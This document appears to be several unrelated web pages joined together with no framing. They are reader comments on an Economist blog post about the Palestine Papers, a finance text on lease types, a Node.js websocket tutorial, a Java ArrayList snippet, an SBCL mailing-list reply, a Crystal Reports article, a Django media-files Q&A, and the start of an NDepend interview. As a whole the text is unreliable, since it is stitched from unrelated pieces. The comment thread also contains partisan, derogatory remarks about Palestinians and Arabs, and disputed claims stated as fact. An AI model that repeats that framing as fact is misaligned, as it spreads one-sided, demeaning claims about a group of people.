To date only the usual suspects, led by Hamas, Fatah's Islamist rivals who rule Gaza, have accused Mr Abbas and his aides of selling out. Inside the West Bank, there have been no reported demonstrations or calls for Mr Abbas to go. Whether the calm continues, though, could depend on Al Jazeera’s next instalments. The channel is broadcasting trailers for further revelations on Palestinian security coordination with Israel, Mr Abbas’s position on the Gaza blockade and the fighting in Gaza in the winter of 2008-2009. Tonight’s promised exposé is on refugees.: @ fuzzywzhe and any other Arab/Muslim apologist: What concessions do you want the Israelis to make? You seem to insist the so-called Palestinians have made concessions! Where's the proof? Read the Clinton Parameters … if the so-called Palestinians wanted peace … Barak and Olmert offered them the deal in 2000 and 2008 … so again where's the proof the so-called Palestinians have made concessions? The Palestine Papers … make it appear … the negotiators have made progress … with their 'lips' … but they haven't told their people ANYTHING … for that matter … what makes these 'clowns' … leaders … What are they leaders of? They DON'T HAVE LEGITIMACY! Why should Israel give them a Peace Deal that they (the Arab/Muslims) can't execute? The deal … and there is a deal available … can only be with the FULL UNDERSTANDING OF THE LARGER ARAB/MUSLIM WORLD … THAT THERE WILL BE NO FURTHER CLAIMS WITH ISRAEL … See the Clinton Parameters … are the Arab/Muslims willing to sign? I don't think they're prepared … they're still too invested in the ideas of 'REPLACING ISRAEL' … not making peace with Israel! Say it ain't so! HAHAHA!. I have to agree with "FernandoTorresIsGod" who says "We will see some imaginative new Israeli excuses for refusing to make peace shortly". 
Right now it's a slow trickle of just blind denial from our so called press, saying that what's been reported has been taken out of context but not giving any examples, that Israel HAS made painful concession offers but not naming any, and of course, absolutely no links to the original source documents. The Fatah cronies are bribed millions or billions to sell out the Palestinian people. It's all a farce. Without the willingness to give up UTTERLY the right of return (say for instance, for a big fat set of individual checks where justified) .. this is all voodoo talks for no purpose. Right of Return is code for no Israel That's ALL there is to it. Al-Jazeera may not know anything about this and neither do the ever grumpy Arab masses but in talks you compromise and concede some stuff. That is why it is called negotation. Besides non Palestinian Arab masses and Arab governments screaming La! La! La! at every turn in history has done the Palestinian people no good. So maybe it is time they started saying maybe... If you are interested about the current situation in Darfur and the arrest warrant issued by the International Criminal Court against President Bashir, come and participate in the discussion at UCLA Law Forum. These leaks show that the Palestinian Authority was willing to bend backwards to accommodate the Israelis but received nothing in return The claim by Israel that there is no reliable peace partner has now been busted. I think Al Jazeera did good to release these documents and I hope more will be forthcoming. On another note: maybe both Israelis and more so the Palestinians are not interested in a two state solution. This is because the Palestinians see themselves as the heirs of the single nation that would be created when the negotiations fail. At least this is what the population growth numbers suggest. Fray Enough of this demagoguery. I did not say who is better, even though Israel obviously is. 
I said this is a region known for its militancy and wars. The same Syria was involved in messing with all its neighbors, all of them. Howcome when it comes to the Israeli Arab conflict, it suddenly becomes all Israel's fault? Where does this assumption that Syria wants peace, but Israel does not, come from? Syria never offered its Kurds a two nations two states solution for example. And by the way why don't I see you people demanding self determination for the Kurds? Here is a real nation, not some pseudo nation like the Palestinians. The Kurds speak their own language, have a distinctive culture and even some of them practice a unique Kurdish religion. 25 million people without a state! Hundreds of thousands died, were gassed with mustard gas by Saddam. Khomeini even declared on them Jihad. Only a few months ago Germany demanded investigation into the use of chemical weapons by Turkey against the Kurds. How many comments you posted during the last year demanding justice for 25 million stateless people? You know, the Kurds in Turkey are not like Israeli Arabs who have schools in Arabic and such stuff. And it's not that the negotiations between the Kurds and Turkey collapsed because the two sides could not agree should they swap 7% or 2%. Turkey is not going to have such negotiations anytime soon. Turkey has never agreed to any partition like Israel did at the beginning and was attacked in response. How has Israel become the source of all troubles and wars in this region that all of you are now leaching on this conflict? So... Israel is better than Syria. Also better than Zimbabwe and North Korea. You must be proud, huh? *** These are not the "second Caliph's" times, NB12.The West Bank and East Jerusalem are occupied territory and are not recognized as part of Israel by any nation on Earth. *** Obviously these are no the second Caliph's times. 
Have you ever had any idea about this region, you would have known that before the Caliphs, this was the most diverse region on earth. Plurality of religions, mystical sects, languages. Where are they all gone? Why does this region look as if it was wiped out by a cultural mega nuclear bomb? Sure, it's all Israel's fault. What a shame the international law could not help them all. The last century and the beggining of this one. Genocide on genocide. Whole communities collapsed. Every second country went through a civil war in which hundreds of thousands died. And yet, what a miraculous coincidence. When it comes to the Jews, the Arabs just kept feeling themselves with the spirit of peace and compromise. How amazing! The only country in the region where a district court can order the army to release data to an NGO that openly engages in subversive activity against its own state. And yet it's this country that's responsible for all wars in the region. The same Syrian regime flattened a whole city, dozens of thousand died, and reconstruction did not start before the regime made sure that enough people visited the place to see what happens to those who dissent. And yet, when it comes to the Israeli Arab conflict, Syria can only want peace and prosperity for the benefit of all people. The dictator just can't overpower his irresistible urge to love the other. What a marvel! The only country in the region that traded territory three times its own size for peace. The only country in the region that was negotiating a two peoples two states solution. Yet, all wars in this region happened because of this country's unmitigated quest for land. What a miracle! Who do you think you are kidding with this silly nonsense? Only yourself "The inadmissibility of THE ACQUISITION of territory by war" :-P Yes, NB12, the UN. I know you would prefer that the US alone, and perhaps Micronesia and Tuvalu, decided about international affairs, but that's the way it is. 
UN Security Council Resolutions are binding and set precedent which all countries must observe (for example, UNSCR 242 stating "the inadmissibility of territory by war"), along with the 4th Geneva Convention and other international treaties which Israel regularly violates with total impunity. And I guess you would also prefer the hasbara department to issue land theft statistics, but sorry, those figures were obtained by Peace Now after an District Court in Jerusalem ordered the data to be delivered by the IDF's Civil Administration to the NGO. And this 32% does not take into account the traditional land ownership norms that used to apply in Palestine since Ottoman times, which Israel has disingenuously disregarded or misinterpreted to classify any land not strictly owned by a particular person as "state land" and free to plunder, as B'tselem exposed in its report "By Hook and Crook" last year. Even the Israeli state comptroller concluded that the Civil Administration’s land registry does not properly reflect land rights in the West Bank (Report 56A). These are not the "second Caliph's" times, NB12.The West Bank and East Jerusalem are occupied territory and are not recognized as part of Israel by any nation on Earth. Jerusalem has a seizable Palestinian population that will not leave its city of birth despite Israel's continuous attempts to the contrary. No Peace deal will ever be achieved without Jerusalem as the capital of Palestine. You'll have to share the city, if you don't want to share the whole country "from the River to the Sea". For one, Froy, you are unfamiliar with the international law. Two, what is this international law? You mean that UN circus that provides all of us with free entertainment by providing global podium to the holy trinity of the UN house clowns: Ahmalalah, Chavez and Gaddafi? You mean that parody on the league of nations where Saudi Arabia is on board of women's right commission with Libya once charing the human rights committee? 
Don't make me laugh, you and the clowns which you and the crowd of your likes worship. And stop quoting me those Peace Now fake statistics. Olmert offered the Palis a fair deal: Israeli withdrawal with swapping 7% of the territory by right sizing both states. The Palis agreed on swapping no more than 2%. 5% of the West Bank is not what would make or break the Palis. Never mind that they were offered to be fully compensated. Never mind that their next step, if they don't turn on Israel first, is to try their luck again in taking over Jordan. There is no 32%. And no 10%. And yes Jerusalem is the Jewish equivalent of Mecca. Mind you, non Muslims are not allowed into neither Mecca nor Medina. Jews were expelled from Arabia already under the second Caliph on the grounds that there can be no two religions in the land of the prophet. Yet, this was not enough. These people also had to expropriate other people's Meccas. Of people who never engaged in missionary activities nor in forced conversions of other people. What do I care for the international law, the abode of hypocrites like your friends and their Western cheer leaders. NB12, it is your point which is moot. Acquiring territory by means of war is strictly forbidden by International Law, regardless of the causes of such war (which was launched by Israel, anyway). That land does not belong to Israel, and it can't settle it with its civilian population. That it belongs to Jordan or to the PA is irrelevant. It still does not belong to Israel. Much less so the 32% that it confiscated from private Palestinian owners. Nobody in the whole world recognizes Israel's annexation of East Jerusalem, and not even Israel pretends that the West Bank belongs to Israel, the main reason being that then it would have to grant Israeli citizenship to the people who live in it. Israel can't have its cake and eat it too. It will have to choose between the land (and the people in it), or two separate sovereign states for each people. 
And the time for choosing is running out. 1948-1947 = 1948-1967 Froy Your point is moot. Only when Jordan relinquished its claim to the West Bank, then the issue of a Palestinian state has become relevant. And as a matter of fact, Jordan relinquished these claims after the collapse of secret negotiations initiated by Israel during which the two sides were negotiating the return of the West Bank to Jordan. And if Jordan would have not joined the 1967 war, it would have stayed with the West Bank. There is no reason in the world why a country that repeatedly initiates aggression against a neighboring state should consider its territorial losses as stealing of land. Jordan rejected the initial two state plan and joined other Arab armies in 1948. Throughout 1948-1947 the West Bank was used to stage cross border attacks on Israel. Finally in 1967 Jordanian forces used the West Bank as a launch pad for another invasion. Enough is enough. NB12, one third of the land over which those settlements were built was privately owned by Palestinians and illegally confiscated by Israel. That is land Israel stole from Palestinians. And in any case, once Jordan gave up claims over that territory in favor of the PLO, all that land which never belonged to Israel regardless of who was the rightful owner, became "Palestinian land" "de jure". So yes, it is very much stolen Palestinian land that Israel has to give back to its legitimate owner. ***Whitechapel. *** There is no Palestinian land Israel stole in the West Bank. Before 1967 the West bank was under the Jordanian rule and used for staging cross border raids by the PLO. Jordan was tricked to join the 1967 war by Egypt when Nasser misled the king into thinking that the Arab forces were victorious. The Jordanian forces entered the fray, but were routed and the West Bank fell under Israeli control. 
There was no Palestinian state there at the time, while the PLO itself positioned itself as a pan Arabist movement fighting for a single pan Arab mega state. "The PLO has long wanted a Palestinian State to co-exist peacefully alongside Israel-there is plenty of evidence on this." The PLO charter was officially rejecting the right of Israel to exist even in in the middle of the Oslo process. Yeah, Brian, time not the return of stolen. Time, with the expansion of settlements. Do you know when the biggest spike in construction in the West Bank was? During those hopeful days in the Oslo years. Remember those days?. "Where's Israel proof?" Perhaps in giving time and time again land in exchange for promises of peace ang getting rocket fire, kidnappings and suicide bombings in return.
http://www.economist.com/blogs/newsbook/2011/01/al_jazeera_and_palestinians
In a way, it is an indirect form of leasing. The owner of an equipment/asset sells it to a leasing company (lessor) which leases it back to the owner (lessee). A classic example of this type of leasing is the sale and lease back of safe deposit vaults by banks, under which a bank sells the vaults in its custody to a leasing company at a market price substantially higher than the book value. The leasing company in turn offers these lockers on a long-term basis to the bank. The bank subleases the lockers to its customers. The lease back arrangement in sale and lease back type of leasing can be in the form of finance lease or operating lease. Direct Lease In direct lease, the lessee and the owner of the equipment are two different entities. A direct lease can be of two types: Bipartite and Tripartite lease. Bipartite Lease There are two parties in the lease transaction: (i) equipment supplier-cum-lessor and (ii) lessee. Such a type of lease is typically structured as an operating lease with inbuilt facilities, like upgradation of the equipment (Upgrade lease), addition to the original equipment configuration and so on. The lessor maintains the asset and, if necessary, replaces it with a similar equipment in working condition (Swap lease). Tripartite Lease Such a type of lease involves three different parties in the lease agreement: equipment supplier, lessor and lessee. An innovative variant of tripartite lease is the sales-aid lease under which the equipment supplier arranges for lease finance in various forms by: · Providing reference about the customer to the leasing company; · Negotiating the terms of the lease with the customer and completing all the formalities on behalf of the leasing company; · Writing the lease on his own account and discounting the lease receivables with the designated leasing company. The effect is that the leasing company owns the equipment and obtains an assignment of the lease rental.
The sales-aid lease is usually with recourse to the supplier in the event of default by the lessee, either in the form of an offer from the supplier to buy back the equipment from the lessor or a guarantee on behalf of the lessee. Single Investor Lease and Leveraged Lease Single Investor Lease There are only two parties to the lease transaction, the lessor and the lessee. The leasing company (lessor) funds the entire investment by an appropriate mix of debt and equity funds. The debts raised by the leasing company to finance the asset are without recourse to the lessee, that is, in the case of default in servicing the debt by the leasing company, the lender is not entitled to payment from the lessee. Leveraged Lease There are three parties to the transaction: (i) lessor (equity investor), (ii) lender and (iii) lessee. In such a lease, the leasing company (equity investor) buys the asset through substantial borrowing, with full recourse to the lessee and without any recourse to itself. The lender (loan participant) obtains an assignment of the lease and of the rentals to be paid by the lessee, as well as a first mortgage on the leased asset. The transaction is routed through a trustee who looks after the interest of the lender and lessor. On receipt of the rentals from the lessee, the trustee remits the debt-service component of the rental to the loan participant and the balance to the lessor. To illustrate, assume that Avon Leasing Ltd (ALL) has structured a leveraged lease with an investment cost of $ 50 crore. The investment is to be financed by equity from it and a loan from Avon Bank Ltd (ABL) in the ratio of 1:4. The interest on the loan may be assumed to be 20 per cent per annum, with the loan repaid in five equated annual instalments. If the required rate of return (gross yield) of ALL is 24 per cent, calculate (a) the equated annual instalment and (b) the annual lease rental.
Like other lease transactions, a leveraged lease entitles the lessor to claim tax shields on depreciation and other capital allowances on the entire investment cost, including the non-recourse debt. The return on equity (profit after tax divided by net worth) is, therefore, high. From the lessee's point of view, the effective rate of interest implicit in the lease arrangement is less than on a straight loan, as the lessor passes on a portion of the tax benefits to the lessee in the form of lower rental payments. Leveraged lease packages are generally structured for leasing investment-intensive assets like aircraft, ships and so on.
http://www.transtutors.com/homework-help/finance/behavioral-finance/framing-effect/house-money/
How to Set Up a Websocket Server with Node.js and Express June 1st, 2021 What You Will Learn in This Tutorial How to attach a websocket server to an existing Express server to add real-time data to your app. Getting started For this tutorial, we're going to be using the CheatCode Node.js Boilerplate. This will give us access to an existing Express server that we can attach our websocket server to: Terminal git clone After you've cloned the project, cd into it and install its dependencies: Terminal cd nodejs-server-boilerplate && npm install Finally, for this tutorial, we need to install two additional dependencies: ws for creating our websocket server and query-string for parsing query params from our websocket connections: Terminal npm i ws query-string After this, start up the development server: Terminal npm run dev Creating a websocket server To begin, we need to set up a new websocket server that can handle inbound websocket requests from clients. First, in the /index.js file of the project we just cloned, let's add a call to the function that will set up our websocket server: /index.js import express from "express"; import startup from "./lib/startup"; import api from "./api/index"; import middleware from "./middleware/index"; import logger from "./lib/logger"; import websockets from './websockets'; startup() .then(() => { const app = express(); const port = process.env.PORT || 5001; middleware(app); api(app); const server = app.listen(port, () => { if (process.send) { process.send(`Server running at http://localhost:${port}`); } }); websockets(server); process.on("message", (message) => { console.log(message); }); }) .catch((error) => { logger.error(error); }); Here, we've imported a hypothetical websockets function from ./websockets which is anticipating an index.js file at that path (Node.js interprets this as ./websockets/index.js).
Inside of the .then() callback for our server startup() function, we've added a call to this function just beneath our call to app.listen(). To it, we pass server which is the HTTP server returned by Express when the HTTP server is opened on the passed port (in this case 5001). Once server is available, we call to our websockets() function, passing in the HTTP server (this is what we'll attach the websocket server to that we'll create in the next section). Attaching a websocket server to an express server Next, we need to create the /websockets/index.js file that we assumed will exist above. To keep our code clean, we're going to create a separate websockets directory at the root of the project we cloned and create an index.js file inside of that: /websockets/index.js import WebSocket from "ws"; export default (expressServer) => { const websocketServer = new WebSocket.Server({ noServer: true, path: "/websockets", }); return websocketServer; }; Here, we export a function that takes in a single argument of expressServer which contains the Express app instance that we intend to pass in when we call the function from /index.js at the root of the project. Just inside that function, we create our websocket server using the Websocket.Server constructor from the ws package that we installed above. To that constructor, we pass the noServer option as true to say "do not set up an HTTP server alongside this websocket server." The advantage to doing this is that we can share a single HTTP server (i.e., our Express server) across multiple websocket connections. We also pass a path option to specify the path on our HTTP server where our websocket server will be accessible (ultimately, localhost:5001/websockets). 
/websockets/index.js import WebSocket from "ws"; export default async (expressServer) => { const websocketServer = new WebSocket.Server({ noServer: true, path: "/websockets", }); expressServer.on("upgrade", (request, socket, head) => { websocketServer.handleUpgrade(request, socket, head, (websocket) => { websocketServer.emit("connection", websocket, request); }); }); return websocketServer; }; Extending our code, next, we need to handle the attachment of the websocket server to the existing expressServer. To do it, on the expressServer we listen for an upgrade event. This event is fired whenever our Express server—a plain HTTP server—receives a request for an endpoint using the websockets protocol. "Upgrade" here is saying, "we need to upgrade this request to handle websockets." Passed to the callback for the event handler—the .on('upgrade') part—we have three arguments request, socket, and head. request represents the inbound HTTP request that was made from a websocket client, socket represents the network connection between the browser (client) and the server, and head represents the first packet/chunk of data for the inbound request. Next, inside the callback for the event handler, we make a call to websocketServer.handleUpgrade(), passing along with the request, socket, and head. What we're saying with this is "we're being asked to upgrade this HTTP request to a websocket request, so perform the upgrade and then return the upgraded connection to us." That upgraded connection, then, is passed to the callback we've added as the fourth argument to websocketServer.handleUpgrade(). With that upgraded connection, we need to handle the connection—to be clear, this is the now-connected websocket client connection. To do it, we "hand off" the upgraded connection websocket and the original request by emitting an event on the websocketServer with the name connection. 
Handling inbound websocket connections At this point, we've upgraded our existing Express HTTP server, however, we haven't completely handled the inbound request. In the last section, we got up to the point where we're able to upgrade the inbound HTTP request from a websocket client into a true websocket connection, however, we haven't handled that connection. /websockets/index.js import WebSocket from "ws"; import queryString from "query-string"; export default async (expressServer) => { const websocketServer = new WebSocket.Server({[...]}); expressServer.on("upgrade", (request, socket, head) => {[...]}); websocketServer.on("connection", (websocketConnection, connectionRequest) => { const [_path, params] = connectionRequest?.url?.split("?"); const connectionParams = queryString.parse(params); }); return websocketServer; }; To handle that connection, we need to listen for the connection event that we emitted in the last section. To do it, we make a call to websocketServer.on('connection'), passing it a callback function that will handle the inbound websocket connection and the accompanying request. To clarify, the difference between the websocketConnection and the connectionRequest is that the former represents the open, long-running network connection between the browser and the server, while the connectionRequest represents the original request to open that connection. Focusing on the callback we've passed to our .on('connection') handler, we do something special. Per the implementation for websockets, there is no way to pass data (e.g., a user's ID or some other identifying information) in the body of a websocket request (similar to how you can pass a body with an HTTP POST request). Instead, we need to include any identifying information in the query params of the URL of our websocket server when connecting to the server via a websocket client (more on this in the next section). Unfortunately, these query params are not parsed by our websocket server and so we need to do this manually.
To extract the query params into a JavaScript object, from the connectionRequest, we grab the URL the request was made for (this is the URL the websocket client makes the connection request to) and split it at the ?. We do this because we don't care about any part of the URL before and up to the ?, or, our query params in URL form. Using JavaScript array destructuring, we take the result of our .split('?') and assume that it returns an array with two values: the path portion of the URL and the query params in URL form. Here, we label the path as _path to suggest that we're not using that value (prefixing an _ underscore to a variable name is a common way to denote this across programming languages). Then, we "pluck off" the params value that was split off from the URL. To be clear, assuming the URL in the request looks like ws://localhost:5001/websockets?test=123&test2=456 we expect something like this to be in the array: ['ws://localhost:5001/websockets', 'test=123&test2=456'] As they exist, the params (in the example above test=123&test2=456) are unusable in our code. To make them usable, we pull in the queryString.parse() method from the query-string package that we installed earlier. This method takes a URL-formatted query string and converts it into a JavaScript object. The end result considering the example URL above would be: { test: '123', test2: '456' } With this, now we can reference our query params in our code via the connectionParams variable. We don't do anything with those here, but this information is included because frankly, it's frustrating to figure that part out. 
/websockets/index.js import WebSocket from "ws"; import queryString from "query-string"; export default async (expressServer) => { const websocketServer = new WebSocket.Server({ noServer: true, path: "/websockets", }); expressServer.on("upgrade", (request, socket, head) => { websocketServer.handleUpgrade(request, socket, head, (websocket) => { websocketServer.emit("connection", websocket, request); }); }); websocketServer.on("connection", (websocketConnection, connectionRequest) => { const [_path, params] = connectionRequest?.url?.split("?"); const connectionParams = queryString.parse(params); websocketConnection.on("message", (message) => { const parsedMessage = JSON.parse(message); console.log(parsedMessage); websocketConnection.send(JSON.stringify({ message: 'There be gold in them thar hills.' })); }); }); return websocketServer; }; Above, we have our completed websocket server implementation. What we've added is an event handler for when our websocketConnection receives an inbound message (the idea of websockets is to keep a long-running connection open between the browser and the server across which messages can be sent back and forth). When a message event comes in, in the callback passed to the event handler, we take in a single message property as a string. Here, we're assuming that our message is a stringified JavaScript object, so we use JSON.parse() to convert that string into a JavaScript object that we can interact with in our code. Finally, to showcase responding to a message from the server, we call websocketConnection.send(), passing a stringified object back (we'll assume the client is also anticipating a stringified JavaScript object being passed in its inbound messages). Testing out the websocket server Because we're not showcasing how to set up a websocket client in a front-end in this tutorial, we're going to use a Chrome/Brave browser extension called Smart Websocket Client that gives us a pseudo front-end that we can use to test things out. On top, we have our HTTP/websocket server running in a terminal (this is the development server of the project we cloned at the beginning of this tutorial) and on the bottom, we have the Smart Websocket Client extension opened up in the browser (Brave).
First, we enter the URL where we expect our websocket server to exist. Notice that instead of the usual http:// that we prefix to a URL when connecting to a server, because we want to open a websocket connection, we prefix our URL with ws:// (similarly, in production, if we have SSL enabled we'd want to use wss:// for "websockets secure"). Because we expect our server to be running on port 5001 (the default port for the project we're building this on top of and where our HTTP server is accepting requests), we use localhost:5001, followed by /websockets?userId=123 to say "on this server, navigate to the /websockets path where our websocket server is attached and include the query param userId set to the value 123."

When we click the "Connect" button in the extension, we get an open connection to our websocket server. Next, to test it out, in the text area beneath the "Send" button, we enter a pre-written stringified object (created by running JSON.stringify({ howdy: "tester" }) in the browser console) and then click the "Send" button to send that stringified object up to the server.

If we watch the server terminal at the top, we can see the userId query param being parsed from the URL when we connect. When we send a message, we see that message logged out on the server and get the expected { message: "There be gold in them thar hills." } message in return on the client.

Wrapping up

In this tutorial, we learned how to set up a websocket server and attach it to an existing Express HTTP server. We learned how to initialize the websocket server and then use the upgrade event on inbound connection requests to support the websockets protocol. Finally, we looked at how to send and receive messages with our connected clients and how to use JSON.stringify() and JSON.parse() to send objects via websockets.
https://cheatcode.co/tutorials/how-to-set-up-a-websocket-server-with-node-js-and-express
Today, I will share a very basic Java program that converts an ArrayList to an array. For most Java developers this is a routine task, but many newcomers to Java have asked me how to convert an ArrayList to an array. Here is the example code.

import java.util.*;

public class ArrayToArrayList {
    public static void main(String args[]) {
        // Create an ArrayList of Strings.
        ArrayList<String> list = new ArrayList<String>();

        // Populate the ArrayList.
        list.add("A1");
        list.add("A2");
        list.add("A3");
        list.add("A4");
        list.add("A5");
        list.add("A6");

        /* Initialize a String array.
           Set the array's capacity equal to the ArrayList size. */
        String[] array = new String[list.size()];

        // Now get the array from the ArrayList. There is no magic here.
        // We are calling the toArray method of the ArrayList class.
        array = list.toArray(array);
    }
}

How to convert a Java Array to a List

In some instances, you may need to convert an array to a list. This is also a simple task. Using the array variable defined in the example above, we can call the asList method of the Arrays class to get a List from the array.

List list2 = Arrays.asList(array);

Enjoy!
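One caveat worth knowing when going in the array-to-List direction: the list returned by Arrays.asList is a fixed-size view backed by the array, so adding or removing elements throws UnsupportedOperationException. A small sketch (class and variable names here are mine, not from the article):

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

public class ConvertDemo {
    public static void main(String[] args) {
        ArrayList<String> list = new ArrayList<>(Arrays.asList("A1", "A2", "A3"));

        // ArrayList -> array: passing a zero-length array lets toArray
        // allocate one of the right size and runtime type.
        String[] array = list.toArray(new String[0]);
        System.out.println(array.length); // 3

        // array -> List: a fixed-size view backed by the array.
        List<String> view = Arrays.asList(array);
        System.out.println(view.get(1)); // A2

        // Writes through the view are visible in the array...
        view.set(0, "B1");
        System.out.println(array[0]); // B1

        // ...but structural changes are not allowed; copy into a real
        // ArrayList if you need to add or remove elements.
        List<String> growable = new ArrayList<>(view);
        growable.add("A4");
        System.out.println(growable.size()); // 4
    }
}
```

Copying into a new ArrayList, as in the last step, is the usual way to get a fully mutable list from an array.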
http://zparacha.com/how-to-convert-an-arraylist-to-array-in-java
You can subscribe to this list here. Showing 3 results of 3

Edi Weitz <edi@...> writes:
> the build process hangs forever and CPU usage (kernel) approaches
> 100%. Any idea what could be the cause?
>
> The file customize-target-features.lisp looks like this
>
> (lambda (list)
>   (adjoin :sb-thread list))

Possibly not related, but some time ago I had a problem with building a threaded SBCL which manifested itself in SBCL giving a 'bad signal number -1' message at warm init and then exiting (so it didn't hang). It was easy to track this down to a bug in (my build of) glibc-2.3.1. A test is to run

#include <stdio.h>
#include <signal.h>

main () {
    printf("%d\n", SIGRTMIN);
}

Upgrading to glibc-2.3.2 eliminated the bug.

Wolfgang
http://sourceforge.net/p/sbcl/mailman/sbcl-help/?viewmonth=200401&viewday=5
This article is intended to illustrate the benefits of using a disconnected connection in Crystal Reports. In connected mode, report performance becomes a big issue as the database grows; especially in web applications, the response time is very poor. XML schemas are now a standard way of moving data between systems. XML schemas are extensible for future use; this property is also very useful when we have changes on the DB side and the report side. By using the benefits of ADO.NET, we can also make desired changes in memory before passing the data to the reports. The sample application is an example in which things are explained in a very simple manner; more complex scenarios can be derived from it. This application runs on .NET Framework 2.0 and Crystal Reports 2008.

Setting the data source location

In Crystal Reports 2008, select the Database location option from the Database menu. Then click on the ADO.NET option. Then design the application in the standard way. Please download the source file and view the sample report file included with this article.

Application logic

Run the executable application and select the respective files. The libraries must be included in the namespace. The CrystalDecisions.CrystalReports.Engine namespace provides support for the report engine.

using CrystalDecisions.CrystalReports.Engine;
using CrystalDecisions.Shared;

In the DataSet object, give the names of the tables defined in the XSD file. I am using only a single table, but there can be multiple tables in a schema, so please don't forget to define the table name in the DataSet while populating it for the respective table.

dsSource = new DataSet("TableA");

Populate the DataSet with the XML source file. This reads the XML schema and data into the System.Data.DataSet using the specified file.
dsSource.ReadXml(strSourceFile);

The ReportDocument object represents a report and contains properties and methods to define, format, load, export, and print the report. For example:

reportDoc = new ReportDocument();
reportDoc.Load(strFileName);

After finalizing the above steps, it is time to pass it to the CrystalReportViewer object. The CrystalReportViewer control allows a Crystal Report to be viewed in an application. The ReportSource property is used to set which report is to be viewed. Once this property is set, the report will be shown in the viewer. The source of the report can either be a ReportDocument, a path to the report file, or a strongly typed report.

reportDoc.SetDataSource(dsSource);
frmShowReport.crViewer.ReportSource = reportDoc;
frmShowReport.ShowDialog();

Thanks
http://www.c-sharpcorner.com/UploadFile/nadeemab/xsd-xml-based-crystal-report-data-source/
Last night I uploaded my project to pythonanywhere.com where I wanted to test my production settings. In one of my models I allow users to upload JPGs (the logo of a team). The uploading process works well; the file lands in my MEDIA_ROOT. The issue is that when I try to access it in my template (to display it on the page) I get a 404. My first thought is that my MEDIA_URL is not configured properly, but I still don't know why. I want to say that my media folder isn't in the project - it is outside. In development mode I see the logo (I have the if settings.DEBUG: urlpattern += static(...) option set properly). I'm using Django 1.9.7 with Python 2.7.

Here is my code. My model:

class Team(models.Model):
    name = models.CharField(verbose_name='Name of the team', max_length=24)
    logo = models.ImageField(upload_to='team_logos', verbose_name='Logo', blank=True, null=True)

    def get_logo(self):
        u"""Get path to logo, if there is no logo then show default."""
        if self.logo:
            return self.logo.url
        return '/static/img/default_team_logo.jpg'

My settings:

STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "media", "soccerV1", "static")
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, "media", "static"),
)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "media", "soccerV1", "media")

My template:

<td><img src="{{ details.get_logo }}" alt="{{ details.name }} logo" height="64px" width="64px"></td>

Answer: You need to set a media files mapping in PythonAnywhere's dashboard. From their documentation, you add an entry that maps a URL (e.g. /media/) to the directory on disk (e.g. /home/username/etc). Then hit Reload and your uploaded files should be served correctly.
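The mechanics behind the 404 are easier to see by tracing the two sides of the mapping. This pure-Python sketch (the file name crest.jpg and the resolved MEDIA_ROOT value are made up for illustration) shows the browser-facing URL the template renders versus the on-disk path where the upload lands; the static-files mapping is what connects the two, and without it the URL resolves to nothing in production:

```python
import posixpath

# Hypothetical resolved values, shaped like the settings in the question.
MEDIA_URL = '/media/'
MEDIA_ROOT = '/home/username/media/soccerV1/media'

# For logo = models.ImageField(upload_to='team_logos'), an uploaded file
# is stored under MEDIA_ROOT and its .url is MEDIA_URL + the stored name.
stored_name = 'team_logos/crest.jpg'

url = MEDIA_URL + stored_name                        # what the <img> tag receives
disk_path = posixpath.join(MEDIA_ROOT, stored_name)  # where the bytes live

print(url)        # /media/team_logos/crest.jpg
print(disk_path)  # /home/username/media/soccerV1/media/team_logos/crest.jpg

# The web server's media mapping must say: requests under MEDIA_URL are
# served from MEDIA_ROOT. Django itself only does this when DEBUG is on
# and the static() urlpattern is installed, which is why it worked in dev.
```

In other words, the model and template were fine; only the server-side URL-to-directory mapping was missing.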
https://codedump.io/share/5MmL54vwfgVc/1/404-on-media-files---django
The Next Level of Code Analysis using 'NDepend': An Interview with Patrick Smacchia

Posted by: Suprotim Agarwal, on 2/6/2009, in Category Product Articles
Views: 69541

Abstract: In this post, Suprotim Agarwal (ASP.NET MVP) interviews Patrick Smacchia, a C# MVP, about the NDepend product.

NDepend is a .NET code analyzer tool on steroids. This tool analyzes your .NET assemblies and the compiled source code with a variety of metrics. I had been using FxCop to date for code analysis, before I was introduced to NDepend by its creator, Patrick Smacchia, a C# MVP. Something that impressed me the most was CQL and code metrics, which can be used to examine complexity and dependencies in your code and improve its overall quality. This tool will in fact change the way you glance at code! In this article, we will discuss the NDepend product with Patrick and understand how this product takes code analysis and code metrics to the next level.

Suprotim: Tell us more about yourself and NDepend. How did the product evolve?

Patrick: My name is Patrick Smacchia, I am French, 33 years old, and I have basically written software since I learnt to write, thanks to my father who has also been a programmer for more than 35 years by now. The NDepend project started in April 2004. At that time I was consulting and I wrote NDepend as a quick project to demystify the massive and extremely complex code base of a client. I was interested to get basic metrics such as NbLinesOfCode but also Robert C. Martin's metrics about abstractness vs. stability. This first NDepend version was pretty useful and I released it OSS online straight away. The tool then became pretty popular, partly because at that time the .NET community was lacking development tools.
I did the math and realized that if a fraction of users would buy a few-hundred-US$ professional license, then I could start making a living on it and invest all my time in development. After a whole year of very hard work, the version 2.0 RTM went live in February 2007 and, fortunately, the business model wasn't flawed. I summarized all this in a blog post and I hope it can encourage fellow developers to innovate and start their own ISV. Since then, the company grew and we worked a lot on both features and usability of our flagship product NDepend.

Suprotim: How does NDepend fit in the Software Development Process? What is CQL and how does it relate to the product?

Patrick: NDepend is all about understanding and controlling what really happens in your development shop. The idea is to fetch relevant information from the code itself. The tool has two sides. The visual side, where the VisualNDepend UI lets you analyze your code base live, with graph, matrix and metrics panels. These visual panels, with dependency graph, matrix and metric treemap, help a lot in churning through the code. Some screenshots can be found here.

Fig 1: Selection by Metrics and display of the set of methods selected in the Metrics View
Fig 2: Using the Dependencies Structure Matrix to understand coupling between assemblies
Fig 3: Selecting the list of methods where code was changed between 2 versions and visualizing source code modifications with Windiff
Fig 4: The Visual Studio Add-In

VisualNDepend also comes with the Code Query Language (CQL). CQL is really at the heart of the product. CQL is to your code what SQL is to your data.
You can, for example, ask which methods have more than 30 lines of code by writing the CQL query:

METHODS WHERE NbLinesOfCode > 30

And if you want to be warned of such big methods, you can transform this CQL query into a CQL rule this way:

WARN IF Count > 0 IN METHODS WHERE NbLinesOfCode > 30

